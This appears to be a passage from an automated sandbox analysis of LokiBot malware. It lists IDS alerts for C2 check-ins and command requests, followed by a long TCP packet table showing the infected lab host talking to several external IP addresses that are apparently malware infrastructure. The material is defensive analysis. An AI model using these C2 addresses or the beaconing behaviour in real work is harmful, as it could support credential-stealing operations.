2024-11-21T01:22:14.673611+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49208	94.156.177.41	80	TCP
2024-11-21T01:22:14.673611+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49208	94.156.177.41	80	TCP
2024-11-21T01:22:14.793565+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.22	49208	TCP
2024-11-21T01:22:15.051076+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49209	94.156.177.41	80	TCP
2024-11-21T01:22:15.051076+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49209	94.156.177.41	80	TCP
2024-11-21T01:22:15.051076+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49209	94.156.177.41	80	TCP
2024-11-21T01:22:16.519414+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49209	94.156.177.41	80	TCP
2024-11-21T01:22:16.519414+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49209	94.156.177.41	80	TCP
2024-11-21T01:22:16.639211+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.22	49209	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 21, 2024 01:20:29.202254057 CET	49161	443	192.168.2.22	198.244.140.41
Nov 21, 2024 01:20:29.202294111 CET	443	49161	198.244.140.41	192.168.2.22
Nov 21, 2024 01:20:29.202368975 CET	49161	443	192.168.2.22	198.244.140.41
Nov 21, 2024 01:20:29.214071035 CET	49161	443	192.168.2.22	198.244.140.41
Nov 21, 2024 01:20:29.214087963 CET	443	49161	198.244.140.41	192.168.2.22
Nov 21, 2024 01:20:30.684592009 CET	443	49161	198.244.140.41	192.168.2.22
Nov 21, 2024 01:20:30.684724092 CET	49161	443	192.168.2.22	198.244.140.41
Nov 21, 2024 01:20:30.692250013 CET	49161	443	192.168.2.22	198.244.140.41
Nov 21, 2024 01:20:30.692282915 CET	443	49161	198.244.140.41	192.168.2.22
Nov 21, 2024 01:20:30.692787886 CET	443	49161	198.244.140.41	192.168.2.22
Nov 21, 2024 01:20:30.693058014 CET	49161	443	192.168.2.22	198.244.140.41
Nov 21, 2024 01:20:30.762569904 CET	49161	443	192.168.2.22	198.244.140.41
Nov 21, 2024 01:20:30.803369045 CET	443	49161	198.244.140.41	192.168.2.22
Nov 21, 2024 01:20:31.203555107 CET	443	49161	198.244.140.41	192.168.2.22
Nov 21, 2024 01:20:31.203656912 CET	443	49161	198.244.140.41	192.168.2.22
Nov 21, 2024 01:20:31.203711033 CET	49161	443	192.168.2.22	198.244.140.41
Nov 21, 2024 01:20:31.203785896 CET	49161	443	192.168.2.22	198.244.140.41
Nov 21, 2024 01:20:31.204983950 CET	49161	443	192.168.2.22	198.244.140.41
Nov 21, 2024 01:20:31.205029011 CET	443	49161	198.244.140.41	192.168.2.22
Nov 21, 2024 01:20:31.207937956 CET	49162	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:31.327446938 CET	80	49162	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:31.327586889 CET	49162	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:31.327749968 CET	49162	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:31.447216034 CET	80	49162	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:32.545392036 CET	80	49162	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:32.545435905 CET	80	49162	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:32.545453072 CET	80	49162	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:32.545519114 CET	80	49162	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:32.545542002 CET	80	49162	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:32.545546055 CET	49162	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:32.545546055 CET	49162	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:32.545569897 CET	49162	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:32.545592070 CET	80	49162	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:32.545607090 CET	80	49162	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:32.545623064 CET	80	49162	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:32.545624018 CET	49162	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:32.545636892 CET	80	49162	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:32.545650005 CET	49162	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:32.545680046 CET	80	49162	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:32.545706987 CET	49162	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:32.545718908 CET	49162	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:32.551525116 CET	49162	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:32.665435076 CET	80	49162	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:32.665503979 CET	49162	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:32.665529013 CET	80	49162	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:32.665605068 CET	49162	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:32.669434071 CET	80	49162	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:32.669495106 CET	49162	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:32.737348080 CET	80	49162	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:32.737411976 CET	49162	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:32.737533092 CET	80	49162	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:32.737579107 CET	49162	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:32.741516113 CET	80	49162	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:32.741564035 CET	49162	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:32.741662025 CET	80	49162	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:32.741708040 CET	49162	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:32.750039101 CET	80	49162	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:32.750093937 CET	49162	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:32.750101089 CET	80	49162	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:32.750152111 CET	49162	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:32.758316040 CET	80	49162	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:32.758390903 CET	49162	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:32.758488894 CET	80	49162	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:32.758553028 CET	49162	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:32.766679049 CET	80	49162	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:32.766716957 CET	80	49162	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:32.766740084 CET	49162	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:32.766752958 CET	49162	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:32.775043964 CET	80	49162	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:32.775116920 CET	49162	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:32.775163889 CET	80	49162	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:32.775331974 CET	49162	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:32.783427000 CET	80	49162	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:32.783503056 CET	49162	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:32.783538103 CET	80	49162	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:32.783587933 CET	49162	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:32.791830063 CET	80	49162	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:32.791901112 CET	49162	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:32.791913033 CET	80	49162	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:32.791961908 CET	49162	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:32.800154924 CET	80	49162	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:32.800230026 CET	49162	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:32.800292015 CET	80	49162	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:32.800343990 CET	49162	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:32.808567047 CET	80	49162	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:32.808604002 CET	80	49162	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:32.808655977 CET	49162	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:32.808670044 CET	49162	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:32.816488028 CET	80	49162	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:32.816555977 CET	49162	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:32.816601992 CET	80	49162	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:32.816651106 CET	49162	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:32.856925011 CET	80	49162	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:32.856985092 CET	80	49162	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:32.857044935 CET	49162	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:32.859937906 CET	49162	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:32.929371119 CET	80	49162	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:32.929425001 CET	49162	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:32.929476976 CET	80	49162	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:32.929522038 CET	49162	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:32.931725979 CET	80	49162	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:32.931785107 CET	49162	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:32.931826115 CET	80	49162	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:32.931866884 CET	49162	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:32.936564922 CET	80	49162	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:32.936582088 CET	80	49162	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:32.936616898 CET	49162	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:32.936639071 CET	49162	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:32.941175938 CET	80	49162	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:32.941250086 CET	49162	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:32.941294909 CET	80	49162	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:32.941368103 CET	49162	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:32.945935011 CET	80	49162	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:32.946006060 CET	49162	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:32.946065903 CET	80	49162	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:32.946120024 CET	49162	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:32.950731039 CET	80	49162	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:32.950799942 CET	80	49162	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:32.950802088 CET	49162	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:32.950855970 CET	49162	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:32.955276012 CET	80	49162	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:32.955360889 CET	49162	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:32.955426931 CET	80	49162	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:32.955490112 CET	49162	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:32.959944010 CET	80	49162	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:32.959996939 CET	49162	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:32.960045099 CET	80	49162	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:32.960094929 CET	49162	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:32.964613914 CET	80	49162	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:32.964663982 CET	49162	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:32.964704037 CET	80	49162	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:32.964760065 CET	49162	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:32.969340086 CET	80	49162	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:32.969402075 CET	49162	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:32.969434023 CET	80	49162	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:32.969540119 CET	49162	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:32.974000931 CET	80	49162	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:32.974052906 CET	49162	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:32.974076986 CET	80	49162	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:32.974124908 CET	49162	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:32.978674889 CET	80	49162	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:32.978764057 CET	49162	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:32.978770971 CET	80	49162	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:32.978827000 CET	49162	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:32.983371019 CET	80	49162	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:32.983448029 CET	49162	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:32.983453035 CET	80	49162	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:32.983501911 CET	49162	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:32.988024950 CET	80	49162	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:32.988064051 CET	80	49162	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:32.988090038 CET	49162	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:32.988109112 CET	49162	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:32.991830111 CET	80	49162	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:32.991895914 CET	49162	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:32.991931915 CET	80	49162	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:32.991982937 CET	49162	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:32.995538950 CET	80	49162	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:32.995593071 CET	49162	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:32.995656967 CET	80	49162	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:32.995708942 CET	49162	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:32.999345064 CET	80	49162	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:32.999416113 CET	49162	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:32.999433994 CET	80	49162	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:32.999486923 CET	49162	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:33.030394077 CET	49162	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:33.030407906 CET	49162	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:33.927261114 CET	49163	443	192.168.2.22	198.244.140.41
Nov 21, 2024 01:20:33.927378893 CET	443	49163	198.244.140.41	192.168.2.22
Nov 21, 2024 01:20:33.927460909 CET	49163	443	192.168.2.22	198.244.140.41
Nov 21, 2024 01:20:33.938064098 CET	49163	443	192.168.2.22	198.244.140.41
Nov 21, 2024 01:20:33.938096046 CET	443	49163	198.244.140.41	192.168.2.22
Nov 21, 2024 01:20:35.408133030 CET	443	49163	198.244.140.41	192.168.2.22
Nov 21, 2024 01:20:35.408210039 CET	49163	443	192.168.2.22	198.244.140.41
Nov 21, 2024 01:20:35.418773890 CET	49163	443	192.168.2.22	198.244.140.41
Nov 21, 2024 01:20:35.418801069 CET	443	49163	198.244.140.41	192.168.2.22
Nov 21, 2024 01:20:35.419224024 CET	443	49163	198.244.140.41	192.168.2.22
Nov 21, 2024 01:20:35.419271946 CET	49163	443	192.168.2.22	198.244.140.41
Nov 21, 2024 01:20:35.530109882 CET	49163	443	192.168.2.22	198.244.140.41
Nov 21, 2024 01:20:35.575334072 CET	443	49163	198.244.140.41	192.168.2.22
Nov 21, 2024 01:20:35.941538095 CET	443	49163	198.244.140.41	192.168.2.22
Nov 21, 2024 01:20:35.941745996 CET	443	49163	198.244.140.41	192.168.2.22
Nov 21, 2024 01:20:35.941854954 CET	49163	443	192.168.2.22	198.244.140.41
Nov 21, 2024 01:20:35.941854954 CET	49163	443	192.168.2.22	198.244.140.41
Nov 21, 2024 01:20:35.943447113 CET	49163	443	192.168.2.22	198.244.140.41
Nov 21, 2024 01:20:35.943492889 CET	443	49163	198.244.140.41	192.168.2.22
Nov 21, 2024 01:20:35.954664946 CET	49164	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:36.074287891 CET	80	49164	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:36.075614929 CET	49164	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:36.075798035 CET	49164	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:36.195308924 CET	80	49164	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:37.351902008 CET	80	49164	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:37.352058887 CET	80	49164	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:37.352092981 CET	80	49164	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:37.352113962 CET	49164	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:37.352113962 CET	49164	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:37.352153063 CET	80	49164	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:37.352166891 CET	49164	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:37.352191925 CET	80	49164	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:37.352209091 CET	49164	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:37.352229118 CET	80	49164	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:37.352248907 CET	49164	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:37.352263927 CET	80	49164	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:37.352277994 CET	49164	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:37.352298975 CET	80	49164	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:37.352317095 CET	49164	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:37.352334023 CET	80	49164	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:37.352344990 CET	49164	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:37.352374077 CET	80	49164	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:37.352391958 CET	49164	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:37.352430105 CET	49164	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:37.359587908 CET	49164	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:37.472297907 CET	80	49164	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:37.472363949 CET	80	49164	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:37.472419024 CET	49164	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:37.472464085 CET	49164	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:37.476351023 CET	80	49164	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:37.476438999 CET	49164	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:37.553267956 CET	80	49164	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:37.553291082 CET	80	49164	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:37.553570986 CET	49164	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:37.555556059 CET	80	49164	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:37.555656910 CET	80	49164	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:37.555659056 CET	49164	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:37.555710077 CET	49164	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:37.563994884 CET	80	49164	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:37.564105988 CET	80	49164	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:37.564135075 CET	49164	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:37.564177036 CET	49164	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:37.572465897 CET	80	49164	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:37.572559118 CET	49164	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:37.572578907 CET	80	49164	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:37.572628975 CET	49164	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:37.580950022 CET	80	49164	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:37.581023932 CET	49164	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:37.581062078 CET	80	49164	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:37.581110954 CET	49164	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:37.589397907 CET	80	49164	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:37.589493990 CET	49164	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:37.589518070 CET	80	49164	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:37.589570999 CET	49164	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:37.597791910 CET	80	49164	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:37.597862005 CET	49164	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:37.597918987 CET	80	49164	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:37.597970963 CET	49164	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:37.606300116 CET	80	49164	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:37.606339931 CET	80	49164	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:37.606380939 CET	49164	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:37.606404066 CET	49164	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:37.614674091 CET	80	49164	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:37.614736080 CET	49164	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:37.614782095 CET	80	49164	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:37.614826918 CET	49164	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:37.622375011 CET	80	49164	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:37.622443914 CET	80	49164	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:37.622478962 CET	49164	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:37.622509003 CET	49164	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:37.630007982 CET	80	49164	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:37.630131006 CET	80	49164	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:37.630132914 CET	49164	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:37.630178928 CET	49164	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:37.637624979 CET	80	49164	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:37.637739897 CET	49164	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:37.754247904 CET	80	49164	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:37.754333973 CET	80	49164	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:37.754355907 CET	49164	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:37.754395962 CET	49164	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:37.755664110 CET	80	49164	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:37.755723953 CET	49164	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:37.755765915 CET	80	49164	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:37.755810022 CET	49164	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:37.760842085 CET	80	49164	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:37.760921001 CET	49164	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:37.760951996 CET	80	49164	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:37.760993958 CET	49164	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:37.765425920 CET	80	49164	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:37.765501976 CET	49164	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:37.765542030 CET	80	49164	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:37.765582085 CET	49164	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:37.770488977 CET	80	49164	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:37.770539999 CET	49164	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:37.770592928 CET	80	49164	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:37.770633936 CET	49164	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:37.775208950 CET	80	49164	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:37.775269985 CET	49164	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:37.775302887 CET	80	49164	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:37.775342941 CET	49164	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:37.780112028 CET	80	49164	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:37.780185938 CET	49164	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:37.780265093 CET	80	49164	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:37.780308962 CET	49164	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:37.785058022 CET	80	49164	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:37.785115957 CET	49164	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:37.785168886 CET	80	49164	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:37.785212040 CET	49164	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:37.789915085 CET	80	49164	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:37.789963961 CET	49164	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:37.789999962 CET	80	49164	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:37.790039062 CET	49164	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:37.794811010 CET	80	49164	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:37.794863939 CET	49164	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:37.794915915 CET	80	49164	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:37.794958115 CET	49164	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:37.799726963 CET	80	49164	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:37.799774885 CET	49164	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:37.799843073 CET	80	49164	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:37.799889088 CET	49164	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:37.804543018 CET	80	49164	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:37.804609060 CET	49164	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:37.804614067 CET	80	49164	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:37.804651022 CET	49164	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:37.809459925 CET	80	49164	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:37.809504032 CET	49164	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:37.809572935 CET	80	49164	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:37.809612036 CET	49164	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:37.814342022 CET	80	49164	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:37.814388037 CET	49164	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:37.814450026 CET	80	49164	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:37.814496040 CET	49164	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:37.814511061 CET	49164	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:37.819267988 CET	80	49164	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:37.819297075 CET	80	49164	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:37.819340944 CET	49164	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:37.819371939 CET	49164	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:37.824121952 CET	80	49164	192.3.243.136	192.168.2.22
